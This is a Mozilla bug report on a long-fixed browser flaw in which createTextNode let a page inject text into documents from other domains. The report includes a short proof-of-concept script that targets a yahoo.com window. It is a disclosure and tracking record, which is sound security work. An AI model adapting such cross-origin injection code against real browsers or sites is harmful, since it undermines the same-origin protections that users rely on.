Closed Bug 15550 Opened 25 years ago Closed 25 years ago

Injecting text in documents from any domain using createTextNode()

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

It is possible to inject text in documents from any domain using createTextNode. The code is: <SCRIPT> a=window.open("http://www.yahoo.com"); setTimeout("f()",10000); function f() { r=a.document.createTextNode("This text injected by Georgi"); a.document.documentElement.appendChild(r); } </SCRIPT>
Status: NEW → ASSIGNED
Blocks: 16654
No longer blocks: 16654
Target Milestone: M12
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.